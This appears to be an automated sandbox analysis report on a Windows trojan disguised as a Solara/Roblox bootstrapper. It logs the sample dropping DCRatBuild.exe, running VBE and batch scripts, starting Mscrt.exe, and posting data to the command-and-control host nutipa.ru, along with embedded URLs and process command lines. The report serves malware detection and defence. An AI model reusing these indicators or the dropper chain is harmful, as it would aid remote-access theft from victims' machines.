Source: global traffic	HTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: nutipa.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: nutipa.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /asset/discord.json HTTP/1.1Host: getsolara.devConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /api/endpoint.json HTTP/1.1Host: getsolara.dev
Source: global traffic	HTTP traffic detected: GET /v2/client-version/WindowsPlayer/channel/live HTTP/1.1Host: clientsettings.roblox.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /dist/v18.16.0/node-v18.16.0-x64.msi HTTP/1.1Host: www.nodejs.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: getsolara.dev
Source: global traffic	DNS traffic detected: DNS query: clientsettings.roblox.com
Source: global traffic	DNS traffic detected: DNS query: www.nodejs.org
Source: global traffic	DNS traffic detected: DNS query: nodejs.org
Source: global traffic	DNS traffic detected: DNS query: nutipa.ru

Source: unknown

HTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: nutipa.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive

Source: Bootstrapper.exe, 00000001.00000002.2096317134.000001901AAAF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:6463
Source: Bootstrapper.exe, 00000001.00000002.2096317134.000001901AAAF000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000001.00000002.2096317134.000001901A9B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:6463/rpc?v=1
Source: Bootstrapper.exe, 00000001.00000002.2096317134.000001901AAAF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:64632
Source: Bootstrapper.exe, 00000001.00000002.2096317134.000001901AB4F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://clientsettings.roblox.com
Source: Bootstrapper.exe, 00000001.00000002.2096317134.000001901AB4F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://edge-term4-fra2.roblox.com
Source: Bootstrapper.exe, 00000001.00000002.2096317134.000001901AA65000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://getsolara.dev
Source: Bootstrapper.exe.0.dr	String found in binary or memory: http://james.newtonking.com/projects/json
Source: Bootstrapper.exe, 00000001.00000002.2096317134.000001901AC98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nodejs.org
Source: Mscrt.exe, 00000014.00000002.2933764806.0000000002BAC000.00000004.00000800.00020000.00000000.sdmp, Mscrt.exe, 00000014.00000002.2933764806.0000000002F49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nutipa.ru
Source: Mscrt.exe, 00000014.00000002.2933764806.0000000002709000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nutipa.ru/
Source: Mscrt.exe, 00000014.00000002.2933764806.0000000002709000.00000004.00000800.00020000.00000000.sdmp, Mscrt.exe, 00000014.00000002.2933764806.0000000002AC4000.00000004.00000800.00020000.00000000.sdmp, Mscrt.exe, 00000014.00000002.2933764806.0000000002E02000.00000004.00000800.00020000.00000000.sdmp, Mscrt.exe, 00000014.00000002.2933764806.0000000002B94000.00000004.00000800.00020000.00000000.sdmp, Mscrt.exe, 00000014.00000002.2933764806.0000000002BAC000.00000004.00000800.00020000.00000000.sdmp, Mscrt.exe, 00000014.00000002.2933764806.0000000002F49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nutipa.ru/_authGamewordpress.php
Source: Bootstrapper.exe, 00000001.00000002.2096317134.000001901AA4D000.00000004.00000800.00020000.00000000.sdmp, Mscrt.exe, 0000000A.00000002.1800397779.0000000004035000.00000004.00000800.00020000.00000000.sdmp, Mscrt.exe, 00000014.00000002.2933764806.0000000002709000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Bootstrapper.exe, 00000001.00000002.2096317134.000001901AB4F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.nodejs.org
Source: Bootstrapper.exe, 00000001.00000002.2096317134.000001901AB4F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://485b1b07.solaraweb-alj.pages.dev/download/static/files/Bootstrapper.exe
Source: Bootstrapper.exe, 00000001.00000002.2096317134.000001901AA82000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000001.00000002.2096317134.000001901AB3F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://485b1b07.solaraweb-alj.pages.dev/download/static/files/Solara.Dir.
Source: Bootstrapper.exe, 00000001.00000002.2096317134.000001901AB4F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://485b1b07.solaraweb-alj.pages.dev/download/static/files/Solara.Dir.zip
Source: wmdqEYgW2i.exe, Bootstrapper.exe.0.dr	String found in binary or memory: https://aka.ms/vs/17/release/vc_redist.x64.exe
Source: Bootstrapper.exe, 00000001.00000002.2096317134.000001901AB4F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clientsettings.roblox.com
Source: Bootstrapper.exe, 00000001.00000002.2096317134.000001901AB4F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clientsettings.roblox.com/v2/client-version/WindowsPlayer/channel/live
Source: Bootstrapper.exe, 00000001.00000002.2096317134.000001901A9B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://discord.com
Source: wmdqEYgW2i.exe, Bootstrapper.exe.0.dr	String found in binary or memory: https://discord.com;http://127.0.0.1:6463/rpc?v=11
Source: Bootstrapper.exe, 00000001.00000002.2096317134.000001901AA5A000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000001.00000002.2096317134.000001901AAC7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getsolara.dev
Source: wmdqEYgW2i.exe, Bootstrapper.exe.0.dr	String found in binary or memory: https://getsolara.dev/api/endpoint.json
Source: wmdqEYgW2i.exe, Bootstrapper.exe.0.dr	String found in binary or memory: https://getsolara.dev/asset/discord.json
Source: wmdqEYgW2i.exe, Bootstrapper.exe.0.dr	String found in binary or memory: https://gitlab.com/cmd-softworks1/a/-/snippets/4768754/raw/main/endpoint.json
Source: wmdqEYgW2i.exe, Bootstrapper.exe.0.dr	String found in binary or memory: https://gitlab.com/cmd-softworks1/a/-/snippets/4768756/raw/main/discord.json
Source: Bootstrapper.exe, 00000001.00000002.2096317134.000001901AAC7000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000001.00000002.2096317134.000001901AB29000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000001.00000002.2096317134.000001901AB4F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ncs.roblox.com/upload
Source: Bootstrapper.exe, 00000001.00000002.2096317134.000001901AB4F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nodejs.org
Source: Bootstrapper.exe, 00000001.00000002.2096317134.000001901AB25000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000001.00000002.2096317134.000001901AAC7000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000001.00000002.2096317134.000001901AB4F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nodejs.org/dist/v18.16.0/node-v18.16.0-x64.msi
Source: wmdqEYgW2i.exe, Bootstrapper.exe.0.dr	String found in binary or memory: https://pastebin.com/raw/pjseRvyK
Source: Bootstrapper.exe.0.dr	String found in binary or memory: https://www.newtonsoft.com/jsonschema
Source: Bootstrapper.exe, 00000001.00000002.2096317134.000001901AB4F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.nodejs.org
Source: wmdqEYgW2i.exe, Bootstrapper.exe.0.dr	String found in binary or memory: https://www.nodejs.org/dist/v18.16.0/node-v18.16.0-x64.msi
Source: wmdqEYgW2i.exe, Bootstrapper.exe.0.dr	String found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734

Source: unknown	HTTPS traffic detected: 104.21.93.27:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.93.27:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 128.116.123.3:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.22.46:443 -> 192.168.2.4:49734 version: TLS 1.2

System Summary

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\SysWOW64\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe

Code function: 3_2_00B16FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,

3_2_00B16FAA

Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Code function: 1_2_00007FFD9B886DB0	1_2_00007FFD9B886DB0
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Code function: 1_2_00007FFD9B892540	1_2_00007FFD9B892540
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: 3_2_00B1848E	3_2_00B1848E
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: 3_2_00B200B7	3_2_00B200B7
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: 3_2_00B24088	3_2_00B24088
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: 3_2_00B140FE	3_2_00B140FE
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: 3_2_00B351C9	3_2_00B351C9
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: 3_2_00B27153	3_2_00B27153
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: 3_2_00B132F7	3_2_00B132F7
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: 3_2_00B262CA	3_2_00B262CA
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: 3_2_00B243BF	3_2_00B243BF
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: 3_2_00B1C426	3_2_00B1C426
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: 3_2_00B1F461	3_2_00B1F461
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: 3_2_00B3D440	3_2_00B3D440
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: 3_2_00B277EF	3_2_00B277EF
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: 3_2_00B3D8EE	3_2_00B3D8EE
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: 3_2_00B1286B	3_2_00B1286B
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: 3_2_00B1E9B7	3_2_00B1E9B7
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: 3_2_00B419F4	3_2_00B419F4
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: 3_2_00B26CDC	3_2_00B26CDC
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: 3_2_00B23E0B	3_2_00B23E0B
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: 3_2_00B34F9A	3_2_00B34F9A
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: 3_2_00B1EFE2	3_2_00B1EFE2
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Code function: 10_2_00007FFD9BC5864F	10_2_00007FFD9BC5864F
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Code function: 10_2_00007FFD9BFE3F30	10_2_00007FFD9BFE3F30
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Code function: 10_2_00007FFD9BFEBE45	10_2_00007FFD9BFEBE45
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Code function: 10_2_00007FFD9BFE16E0	10_2_00007FFD9BFE16E0
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Code function: 20_2_00007FFD9BFDC219	20_2_00007FFD9BFDC219
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Code function: 20_2_00007FFD9BFDD251	20_2_00007FFD9BFDD251
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Code function: 20_2_00007FFD9BFD3F30	20_2_00007FFD9BFD3F30
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Code function: 20_2_00007FFD9BFDBE45	20_2_00007FFD9BFDBE45
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Code function: 20_2_00007FFD9BFD16E0	20_2_00007FFD9BFD16E0

Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: String function: 00B2EC50 appears 56 times
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: String function: 00B2F5F0 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Code function: String function: 00B2EB78 appears 39 times

Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe

Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7532 -s 2204

Source: wmdqEYgW2i.exe	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64 Mono/.Net assembly, for MS Windows
Source: wmdqEYgW2i.exe	Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows

Source: wmdqEYgW2i.exe, 00000000.00000000.1679810718.0000000000408000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameSolaraBootstrapper.exeF vs wmdqEYgW2i.exe
Source: wmdqEYgW2i.exe, 00000000.00000000.1679810718.0000000000408000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs wmdqEYgW2i.exe
Source: wmdqEYgW2i.exe, 00000000.00000003.1684903614.0000000002628000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSolaraBootstrapper.exeF vs wmdqEYgW2i.exe
Source: wmdqEYgW2i.exe, 00000000.00000003.1687516055.00000000033CC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs wmdqEYgW2i.exe
Source: wmdqEYgW2i.exe	Binary or memory string: OriginalFilenameSolaraBootstrapper.exeF vs wmdqEYgW2i.exe
Source: wmdqEYgW2i.exe	Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs wmdqEYgW2i.exe

Source: wmdqEYgW2i.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: 0.3.wmdqEYgW2i.exe.341a70f.0.raw.unpack, DmcWucu9ZjDuseHj6np.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.3.wmdqEYgW2i.exe.341a70f.0.raw.unpack, DmcWucu9ZjDuseHj6np.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.3.wmdqEYgW2i.exe.341a70f.0.raw.unpack, DmcWucu9ZjDuseHj6np.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.3.wmdqEYgW2i.exe.341a70f.0.raw.unpack, DmcWucu9ZjDuseHj6np.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.0.wmdqEYgW2i.exe.51f97b.3.raw.unpack, DmcWucu9ZjDuseHj6np.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.0.wmdqEYgW2i.exe.51f97b.3.raw.unpack, DmcWucu9ZjDuseHj6np.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.0.wmdqEYgW2i.exe.51f97b.3.raw.unpack, DmcWucu9ZjDuseHj6np.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.0.wmdqEYgW2i.exe.51f97b.3.raw.unpack, DmcWucu9ZjDuseHj6np.cs	Cryptographic APIs: 'CreateDecryptor'

Source: classification engine

Classification label: mal100.troj.evad.winEXE@29/71@5/6

Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe

Code function: 3_2_00B16C74 GetLastError,FormatMessageW,

3_2_00B16C74

Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe

Code function: 3_2_00B2A6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,

3_2_00B2A6C2

Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe

File created: C:\Users\user\Desktop\DISCORD

Jump to behavior

Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8076:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7840:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7540:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7692:120:WilError_03
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7532
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-1PskwlBIP03G3dSi5snm

Source: C:\Users\user\Desktop\wmdqEYgW2i.exe

File created: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe

Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ComponentReviewperfmonitor\QUMJYJlT6Ngt.bat" "

Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Command line argument: sfxname	3_2_00B2DF1E
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Command line argument: sfxstime	3_2_00B2DF1E
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Command line argument: STARTDLG	3_2_00B2DF1E

Source: wmdqEYgW2i.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.19%

Source: C:\ComponentReviewperfmonitor\Mscrt.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\wmdqEYgW2i.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\wmdqEYgW2i.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: wmdqEYgW2i.exe	ReversingLabs: Detection: 97%
Source: wmdqEYgW2i.exe	Virustotal: Detection: 91%

Source: wmdqEYgW2i.exe	String found in binary or memory: --START ERROR INFO--
Source: wmdqEYgW2i.exe	String found in binary or memory: pve[!] Error checking WebView2 runtime installation: chttps://go.microsoft.com/fwlink/p/?LinkId=2124703=MicrosoftEdgeWebview2Setup.exe!/silent /installQWebView2 runtime installed successfully.GError installing WebView2 runtime: iSOFTWARE\Microsoft\VisualStudio\14.0\VC\Runtimes\X64
Source: wmdqEYgW2i.exe	String found in binary or memory: Installed#vc_redist.x64.exe5/install /quiet /norestart

Source: unknown	Process created: C:\Users\user\Desktop\wmdqEYgW2i.exe "C:\Users\user\Desktop\wmdqEYgW2i.exe"
Source: C:\Users\user\Desktop\wmdqEYgW2i.exe	Process created: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe "C:\Users\user\AppData\Local\Temp\Bootstrapper.exe"
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\wmdqEYgW2i.exe	Process created: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe "C:\Users\user\AppData\Local\Temp\DCRatBuild.exe"
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ComponentReviewperfmonitor\Uq2tX7p25HNYhIggX0PpAZXDUcRcexvQlwrHhzLqWtjOjit.vbe"
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Process created: C:\Windows\System32\cmd.exe "cmd" /c ipconfig /all
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\ipconfig.exe ipconfig /all
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ComponentReviewperfmonitor\QUMJYJlT6Ngt.bat" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\ComponentReviewperfmonitor\Mscrt.exe "C:\ComponentReviewperfmonitor/Mscrt.exe"
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\C7dhHeH1wD.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7532 -s 2204
Source: C:\Windows\System32\cmd.exe	Process created: C:\ComponentReviewperfmonitor\Mscrt.exe "C:\ComponentReviewperfmonitor\Mscrt.exe"
Source: C:\Users\user\Desktop\wmdqEYgW2i.exe	Process created: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe "C:\Users\user\AppData\Local\Temp\Bootstrapper.exe"	Jump to behavior
Source: C:\Users\user\Desktop\wmdqEYgW2i.exe	Process created: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe "C:\Users\user\AppData\Local\Temp\DCRatBuild.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Process created: C:\Windows\System32\cmd.exe "cmd" /c ipconfig /all	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ComponentReviewperfmonitor\Uq2tX7p25HNYhIggX0PpAZXDUcRcexvQlwrHhzLqWtjOjit.vbe"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ComponentReviewperfmonitor\QUMJYJlT6Ngt.bat" "	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\ipconfig.exe ipconfig /all	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\ComponentReviewperfmonitor\Mscrt.exe "C:\ComponentReviewperfmonitor/Mscrt.exe"	Jump to behavior
Source: C:\ComponentReviewperfmonitor\Mscrt.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\C7dhHeH1wD.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\ComponentReviewperfmonitor\Mscrt.exe "C:\ComponentReviewperfmonitor\Mscrt.exe"	Jump to behavior

Source: C:\Users\user\Desktop\wmdqEYgW2i.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\wmdqEYgW2i.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\wmdqEYgW2i.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\wmdqEYgW2i.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\wmdqEYgW2i.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\wmdqEYgW2i.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\wmdqEYgW2i.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\wmdqEYgW2i.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\wmdqEYgW2i.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\wmdqEYgW2i.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\wmdqEYgW2i.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\wmdqEYgW2i.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\wmdqEYgW2i.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\wmdqEYgW2i.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\wmdqEYgW2i.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\wmdqEYgW2i.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\wmdqEYgW2i.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\wmdqEYgW2i.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\wmdqEYgW2i.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\wmdqEYgW2i.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\wmdqEYgW2i.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\wmdqEYgW2i.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\wmdqEYgW2i.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe	Section loaded: winnsi.dll	Jump to behavior
